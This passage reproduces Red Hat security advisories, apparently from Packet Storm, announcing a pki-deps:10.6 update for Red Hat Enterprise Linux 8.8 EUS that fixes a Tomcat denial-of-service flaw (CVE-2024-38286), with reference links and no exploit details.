rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The Public Key Infrastructure (PKI) Core contains fundamental packages required by Red Hat Certificate System.Security Fix(es):* tomcat: Denial of Service in Tomcat (CVE-2024-38286)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-38286References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2314686

Red Hat Security Advisory 2024-8572-03

Red Hat Security Advisory 2024-8567-03 - An update for the pki-deps:10.6 module is now available for Red Hat Enterprise Linux 8.8 Extended Update Support. Issues addressed include a denial of service vulnerability.

    The following advisory data is extracted from:https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_8567.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: pki-deps:10.6 security updateAdvisory ID:        RHSA-2024:8567-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:8567Issue date:         2024-10-30Revision:           03CVE Names:          CVE-2024-38286====================================================================Summary: An update for the pki-deps:10.6 module is now available for Red Hat Enterprise Linux 8.8 Extended Update Support.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The Public Key Infrastructure (PKI) Core contains fundamental packages required by Red Hat Certificate System.Security Fix(es):* tomcat: Denial of Service in Tomcat (CVE-2024-38286)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-38286References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2314686

Tag

#linux